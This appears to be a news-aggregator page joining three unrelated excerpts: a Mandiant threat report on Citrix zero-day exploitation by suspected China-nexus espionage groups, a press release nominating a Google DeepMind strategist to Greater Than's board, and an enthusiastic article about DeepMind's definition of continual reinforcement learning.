Mandiant cannot attribute this activity based on the evidence collected thus far, however, this type of activity is consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADCs in 2022. The evolution of the China-nexus cyber threat landscape has evolved to such an extent, that its ecosystem mirrors more closely that of financial crime clusters, with connections and code overlap not necessarily offering the comprehensive picture. Additionally, Mandiant has observed a preponderance of actors utilizing the combination of NPS proxy and REGEORG.NEO as having a China-nexus.

Media reports indicate APT5 exploited a zero day vulnerability in Citrix ADC and Gateway devices allowing pre-authenticated remote code execution on vulnerable devices. Following that exploitation, the National Security Agency (NSA) published a report detailing APT5 capabilities against Citrix ADCs. In the report, NSA states targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls. NSA, in collaboration with partners, developed threat hunting guidance to provide steps organizations can take to look for possible artifacts of this type of activity.

Mandiant tracks additional Chinese cyber espionage threat actors using botnets to obfuscate traffic between attackers and victim networks, including APT41, APT31, APT15, TEMP.Hex, and Volt Typhoon. Cyber espionage threat actors continue to target technologies that do not support endpoint detection and response (EDR) solutions such as firewalls, IoT devices, hypervisors and VPN technologies (e.g. Fortinet, SonicWall, Pulse Secure, and others). Mandiant has investigated dozens of intrusions at defense industrial base (DIB), government, technology, and telecommunications organizations over the years where suspected China-nexus groups have exploited zero-day vulnerabilities and deployed custom malware to steal user credentials and maintain long-term access to the victim environments.

See the original post:
Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE ... - Mandiant

Read More..

Google DeepMind, Strategy Partner, Technology, Claudia van der Salm proposed for election to Greater Than’s Board of Directors – Yahoo Finance

STOCKHOLM, July 25, 2023 /PRNewswire/ -- Greater Than (GREAT.ST), the global provider of driver crash probability and climate impact intelligence, is announcing that its largest shareholders propose Claudia vander Salm to be elected as a board member.

Van der Salm currently holds the position of Strategy Partner, Technology, at Google DeepMind, a unit of Google. Google DeepMind is committed to solving intelligence to advance science and benefit humanity. At Google DeepMind, van der Salm is partnering across hardware, software, data, and engineering to accelerate the progress towards Google DeepMind's mission.

Van der Salm is also a Member of the Board of Directors at Montoux, New Zealand,an insurtech company providing a next generation actuarial modeling platformfor insurers,predominantly in life, health, and the long-term care market. At Montoux, van der Salm applies her international executive-level insurance experience to support the company's global expansion.

Prior to her current positions, van der Salm worked at Aegon/Transamerica, a global insurer providing life insurance, savings, pensions, asset management, general insurance and accident & health, where she gained extensive experience working in Europe, USA, and Asia Pacific, most notably in her recent roles as Chief Investment Officer and Chief Risk Officer.

As an executive with international insurance and technology experience, van der Salm will bring to Greater Than a strong background in the areas of artificial intelligence, insurance, strategy & business development, innovation, data analytics, risk management, investments and sustainability. Her passion for lifetime learning and making meaningful contributions to a sustainable future for all aligns with Greater Than's mission to empower customers with the most valuable data insights into driver impact.

"Claudia van der Salm has an impressive background working within AI, data analytics, and insurance for the betterment of society," said Sten Forseke, Founder of Greater Than. "Her experience of building empowered teams and helping businesses and individuals to excel will bring exceptional value to the company as we continue to grow internationally."

Story continues

Press contact, Greater Than:PR@greaterthan.eu+46 855 593 200www.greaterthan.eu

The following files are available for download:

Cision

View original content:https://www.prnewswire.co.uk/news-releases/google-deepmind-strategy-partner-technology-claudia-van-der-salm-proposed-for-election-to-greater-thans-board-of-directors-301885059.html

Read the rest here:
Google DeepMind, Strategy Partner, Technology, Claudia van der Salm proposed for election to Greater Than's Board of Directors - Yahoo Finance

Read More..

Is Reinforcement Learning Set to Transform with DeepMind’s … – Cryptopolitan

Description

In a groundbreaking research endeavor, a team of experts at DeepMind has redefined Reinforcement Learning (RL) by providing a comprehensive, precise mathematical definition of Continual Reinforcement Learning (CRL). The paper titled A Definition of Continual Reinforcement Learning challenges conventional RL approaches and establishes a solid conceptual foundation for agents that perpetually adapt and learn from Read more

In a groundbreaking research endeavor, a team of experts at DeepMind has redefined Reinforcement Learning (RL) by providing a comprehensive, precise mathematical definition of Continual Reinforcement Learning (CRL). The paper titled A Definition of Continual Reinforcement Learning challenges conventional RL approaches and establishes a solid conceptual foundation for agents that perpetually adapt and learn from their experiences. By introducing a pair of operators on agents and formalizing core definitions, the team lays the groundwork for future research in the field of CRL.

The DeepMind research teams paper offers novel insights into the realm of Continual Reinforcement Learning (CRL), reshaping the conventional understanding of RL agents. Rather than merely addressing specific issues, these agents are designed to learn continuously and adapt indefinitely. The key aspect of CRL lies in agents that never stop their implicit search over a set of behaviors. This creates an environment where the best agents perpetually update and refine their behaviors based on experience, thereby pushing the boundaries of AI and reinforcement learning.

The core of the research revolves around the formalization of Continual Reinforcement Learning and the establishment of a clean, general, and precise mathematical foundation. The team begins by defining environments, agents, and their interplay. They view the interface between an agent and their environment as two pairs of countable sets of actions and observations, each represented by a history of action-observation pairs. Both the environment and the agent are formulated as functions that respect this agent-environment interface.

To capture the essence of Continual Reinforcement Learning, the researchers propose a two-fold approach

DeepMinds groundbreaking research not only provides a robust definition of Continual Reinforcement Learning but also offers invaluable guidance on designing principled continual learning agents. The implications of this work extend to the creation of AI agents that adapt, evolve, and optimize their behaviors continually, resulting in agents that do not merely solve problems but consistently improve and refine their decision-making processes based on experience.

The teams efforts open doors to a new perspective in designing AI agents, shifting the focus from creating agents that aim to solve specific problems to developing agents that never stop learning and refining their behaviors. This paradigm shift is expected to drive substantial advancements in the realm of Artificial Intelligence and Reinforcement Learning, paving the way for a new generation of smarter, more adaptive AI agents.

As the field of Continual Reinforcement Learning gains traction, the DeepMind research team acknowledges the need for further exploration. They intend to delve into the connections between the formalism of continual learning and the empirical studies in recent times. By bridging theory and practice, the researchers aspire to unlock new possibilities and refine their understanding of Continual Reinforcement Learning, enriching the AI landscape with agents that can learn, adapt, and make intelligent decisions in an ever-changing world.

DeepMinds pioneering work in establishing a precise mathematical foundation for Continual Reinforcement Learning is a significant breakthrough in the realm of AI and RL. By rethinking RL problems as endless adaptation, they have laid the groundwork for a new generation of AI agents that perpetually update their behaviors based on experience. This opens up exciting avenues for future research, pushing the boundaries of AI and Reinforcement Learning to new heights. As the world embraces the potential of CRL, the future of AI looks brighter and more promising than ever before.

See original here:
Is Reinforcement Learning Set to Transform with DeepMind's ... - Cryptopolitan

Read More..